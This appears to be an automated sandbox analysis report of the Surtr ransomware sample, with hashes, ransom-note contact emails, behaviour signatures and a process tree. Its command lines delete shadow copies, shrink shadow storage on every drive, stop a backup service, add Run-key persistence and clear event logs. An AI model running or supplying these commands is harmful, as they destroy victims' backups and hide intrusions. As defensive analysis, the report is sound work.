Analysis
- max time kernel: 121s
- max time network: 152s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 24-12-2021 07:08
Static task: static1
Behavioral task: behavioral1
  Sample: surtr.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: surtr.exe
  Resource: win10-en-20211208
General
- Target: surtr.exe
- Size: 320KB
- MD5: e6fc190168519d6a6c4f1519e9450f0f
- SHA1: af2080ddf1064fb80c7b9af942aaabf264441098
- SHA256: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
- SHA512: 4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
Malware Config
Extracted
  Path: C:\ProgramData\Service\SURTR_README.txt
  Emails: DecryptMyData@mailfence.com, Decrypter@msgsafe.io
Extracted
  Path: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta
  Family: surtr
  Emails: DecryptMyData@mailfence.com, Decrypter@msgsafe.io
Signatures
- Detects Surtr Payload (2 IoCs)
  Processes:
    - behavioral2/memory/3680-116-0x0000000140133F50-mapping.dmp  (yara_rule: family_surtr)
    - behavioral2/memory/3680-118-0x0000000140000000-0x0000000140136000-memory.dmp  (yara_rule: family_surtr)
- Surtr
  Ransomware family first seen in late 2021.
-
  Processes: reg.exe
    - Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  (reg.exe)
- Clears Windows event logs (1 TTPs, 64 IoCs)
  Processes: wevtutil.exe
    pid (process, where captured): 4988 (wevtutil.exe), 2084, 4236 (wevtutil.exe), 4920 (wevtutil.exe), 264, 1224 (wevtutil.exe), 4184 (wevtutil.exe), 4916 (wevtutil.exe), 1252, 1216, 4556, 5032, 4360 (wevtutil.exe), 4984 (wevtutil.exe), 1964, 276, 3520, 3324, 4548, 2332, 4416, 4904, 3724, 280 (wevtutil.exe), 4512 (wevtutil.exe), 1016, 4488 (wevtutil.exe), 5052, 4812, 5024, 4176, 2116, 5000 (wevtutil.exe), 3920, 592, 3864 (wevtutil.exe), 904 (wevtutil.exe), 3720 (wevtutil.exe), 4976, 4536, 5116, 4932, 4564, 2300, 4316, 3772 (wevtutil.exe), 4012, 3440 (wevtutil.exe), 4144, 636, 4416, 1480, 5020 (wevtutil.exe), 1068 (wevtutil.exe), 4428 (wevtutil.exe), 3380, 932, 592 (wevtutil.exe), 4904 (wevtutil.exe), 4872 (wevtutil.exe), 5108, 3124, 816, 4004
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
-
- Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
  Processes: bcdedit.exe
    pid (process): 4776 (bcdedit.exe), 1036 (bcdedit.exe)
- Disables Task Manager via registry modification
-
- Disables use of System Restore points (1 TTPs)
-
  Processes:
    - behavioral2/memory/3680-115-0x0000000140000000-0x0000000140136000-memory.dmp  (yara_rule: upx)
    - behavioral2/memory/3680-117-0x0000000140000000-0x0000000140136000-memory.dmp  (yara_rule: upx)
    - behavioral2/memory/3680-118-0x0000000140000000-0x0000000140136000-memory.dmp  (yara_rule: upx)
- Drops startup file (6 IoCs)
  Processes: cmd.exe, net1.exe, net.exe
    - File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta  (cmd.exe)
    - File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta  (cmd.exe)
    - File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt  (net1.exe)
    - File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt  (net1.exe)
    - File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe  (net.exe)
    - File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe  (net.exe)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
-
- Adds Run key to start application (2 TTPs, 8 IoCs)
  Processes: cmd.exe, reg.exe
    - Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"  (cmd.exe)
    - Key created: \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  (reg.exe)
    - Set value (str): \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"  (reg.exe)
    - Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce  (reg.exe)
    - Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"  (reg.exe)
    - Key created: \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce  (cmd.exe)
    - Set value (str): \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"  (cmd.exe)
    - Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  (cmd.exe)
- Enumerates connected drives (3 TTPs, 48 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: vssadmin.exe, surtr.exe
    - File opened (read-only) by vssadmin.exe: \??\J:, \??\A:, \??\E:, \??\Z:, \??\T:, \??\V:, \??\N:, \??\B:, \??\I:, \??\R:, \??\Y:, \??\W:, \??\P:, \??\S:, \??\L:, \??\Q:, \??\H:, \??\K:, \??\U:, \??\M:, \??\D:, \??\G:, \??\X:, \??\F:
    - File opened (read-only) by surtr.exe: \??\E:, \??\L:, \??\P:, \??\G:, \??\B:, \??\K:, \??\F:, \??\I:, \??\O:, \??\Q:, \??\R:, \??\T:, \??\H:, \??\W:, \??\J:, \??\N:, \??\V:, \??\Z:, \??\M:, \??\S:, \??\U:, \??\X:, \??\Y:, \??\A:
- Suspicious use of SetThreadContext (1 IoCs)
  Processes: surtr.exe
    - PID 2668 set thread context of 3680  (process: 2668 surtr.exe; target process: 3680 surtr.exe)
- Drops file in Program Files directory (64 IoCs)
  Processes: surtr.exe (the process for every entry below)
    - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\share_icons2x.png.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial2-ul-oob.xrm-ms.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Excel.EditorRibbon.dll.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\INDUST\THMBNAIL.PNG.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\1033\BCSRuntimeRes.dll.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\System.Xml.Linq.Resources.dll.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\THMBNAIL.PNG.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\7-Zip\Lang\nb.txt.[DecryptMyData@mailfence.com].SURT
    - File created: C:\Program Files\Java\jre1.8.0_66\SURTR_README.hta
    - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Grace-ppd.xrm-ms.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.Recommendation.Common.dll.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\GFX.DLL.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\RMNSQUE.ELM.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win8.css.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Client\api-ms-win-crt-utility-l1-1-0.dll.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-ppd.xrm-ms.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\PROCDB.XLAM.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\ui-strings.js.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\SUMIPNTG.INF.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2.gif.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\ui-strings.js.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\plugin.js.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond.xml.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Grace-ppd.xrm-ms.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\WordR_Trial-ppd.xrm-ms.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\MSSOAPR3.DLL.[DecryptMyData@mailfence.com].SURT
    - File created: C:\Program Files (x86)\Windows NT\Private_DATA.surt
    - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\ui-strings.js.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\ui-strings.js.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_bn.dll.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\SkypeSrv\SFBAPPSDK.DLL.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ESEN\WT61ES.LEX.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview_selected-hover.svg.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_sv.dll.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Grace-ppd.xrm-ms.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_partialselected-default_18.svg.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ro_get.svg.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fill-sign.png.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri Light-Constantia.xml.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Windows Defender\es-ES\MsMpResL.dll.mui.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-100.png.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\VideoLAN\VLC\plugins\logger\libconsole_logger_plugin.dll.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\checkmark-2x.png.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\7-Zip\Lang\sq.txt.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Retail-ul-phn.xrm-ms.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\wordvisi.ttf.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\THMBNAIL.PNG.[DecryptMyData@mailfence.com].SURT
    - File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\PortalConnectCore.dll.[DecryptMyData@mailfence.com].SURT
- Creates scheduled task(s) (1 TTPs, 3 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes: schtasks.exe
    pid (process, where captured): 1304 (schtasks.exe), 4872 (schtasks.exe), 2472
- Interacts with shadow copies (2 TTPs, 26 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe
    pid (all vssadmin.exe): 508, 4032, 2292, 3796, 3700, 4288, 3324, 1360, 1796, 4132, 4200, 2224, 4308, 2156, 1184, 1188, 4080, 4192, 2928, 3788, 3916, 3772, 1340, 4040, 4152, 4256
- Opens file in notepad (likely ransom note) (1 IoCs)
  Processes:
    pid (process not captured): 984
- Runs net.exe
-
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: surtr.exe
    pid (process): 3680 (surtr.exe), 3680 (surtr.exe)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: vssvc.exe, net1.exe, cmd.exe, wevtutil.exe, net.exe
    - vssvc.exe (2008): Token: SeBackupPrivilege, Token: SeRestorePrivilege, Token: SeAuditPrivilege
    - Token: SeSecurityPrivilege and Token: SeBackupPrivilege, one entry each, for: net1.exe (3320), cmd.exe (4528), wevtutil.exe (2616), wevtutil.exe (3048), cmd.exe (4628), net.exe (4608), net.exe (4548), net1.exe (3860), net.exe (1780), net.exe (4180), net1.exe (5056), net.exe (2320), wevtutil.exe (5092), wevtutil.exe (1608), net.exe (1380), wevtutil.exe (4812), net.exe (4892), net1.exe (3240), wevtutil.exe (284), cmd.exe (1488), wevtutil.exe (4868), net1.exe (3088), net1.exe (3984), wevtutil.exe (4080), wevtutil.exe (4996), wevtutil.exe (4336), net.exe (4352), cmd.exe (4112), wevtutil.exe (3040), wevtutil.exe (4236)
    - wevtutil.exe (4476): Token: SeSecurityPrivilege
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: surtr.exe, cmd.exe
    - PID 2668 wrote to memory of 3680  (2668 surtr.exe -> 3680 surtr.exe), 7 entries
    - PID 3680 wrote to memory of 2332, 4032, 2260  (3680 surtr.exe -> cmd.exe), 2 entries per target
    - PID 2260 wrote to memory of 1184  (2260 cmd.exe -> 1184 chcp.com), 2 entries
    - PID 3680 wrote to memory of 772, 1520, 1732, 3060, 3744, 3984, 3520, 3920, 3344, 3640, 2772, 1472, 2784, 2600, 1336, 1320, 1616, 664, 592, 1176, 1264, 2568, 2392, 2552  (3680 surtr.exe -> cmd.exe), 2 entries per target
    - PID 3680 wrote to memory of 1252  (3680 surtr.exe -> cmd.exe), 1 entry
- Views/modifies file attributes (1 TTPs, 8 IoCs)
  Processes: attrib.exe
    pid (process, where captured): 4176, 940, 5092, 2136, 1804, 4848, 4812 (attrib.exe), 264 (attrib.exe)
Processes
- C:\Users\Admin\AppData\Local\Temp\surtr.exe
  "C:\Users\Admin\AppData\Local\Temp\surtr.exe"
  Signatures: Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\surtr.exe
      "C:\Users\Admin\AppData\Local\Temp\surtr.exe"
      Signatures: Enumerates connected drives; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c echo off
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c chcp 437
          Signatures: Suspicious use of WriteProcessMemory
            - C:\Windows\system32\chcp.com
              chcp 437
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
            - C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
                - C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
                  Signatures: Enumerates connected drives; Interacts with shadow copies
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
            - C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
                - C:\Windows\system32\vssadmin.exe
                  vssadmin Delete Shadows /all /quiet
                  Signatures: Interacts with shadow copies
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"
            - C:\Windows\system32\net.exe
              net stop "Acronis VSS Provider"
                - C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop "Acronis VSS Provider"
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
            - C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                - C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                  Signatures: Enumerates connected drives; Interacts with shadow copies
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
            - C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
                - C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
                  Signatures: Enumerates connected drives; Interacts with shadow copies
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
            - C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
                - C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
                  Signatures: Enumerates connected drives; Interacts with shadow copies
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
            - C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
                - C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
                  Signatures: Enumerates connected drives; Interacts with shadow copies
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
            - C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
                - C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
                  Signatures: Enumerates connected drives; Interacts with shadow copies
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
            - C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
                - C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
                  Signatures: Enumerates connected drives; Interacts with shadow copies
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
            - C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
                - C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
                  Signatures: Enumerates connected drives; Interacts with shadow copies
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
            - C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
                - C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
                  Signatures: Enumerates connected drives; Interacts with shadow copies
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
            - C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
                - C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
                  Signatures: Enumerates connected drives; Interacts with shadow copies
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
            - C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
            - C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
                - C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
                  Signatures: Enumerates connected drives; Interacts with shadow copies
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
            - C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
                - C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
                  Signatures: Enumerates connected drives; Interacts with shadow copies
        - C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
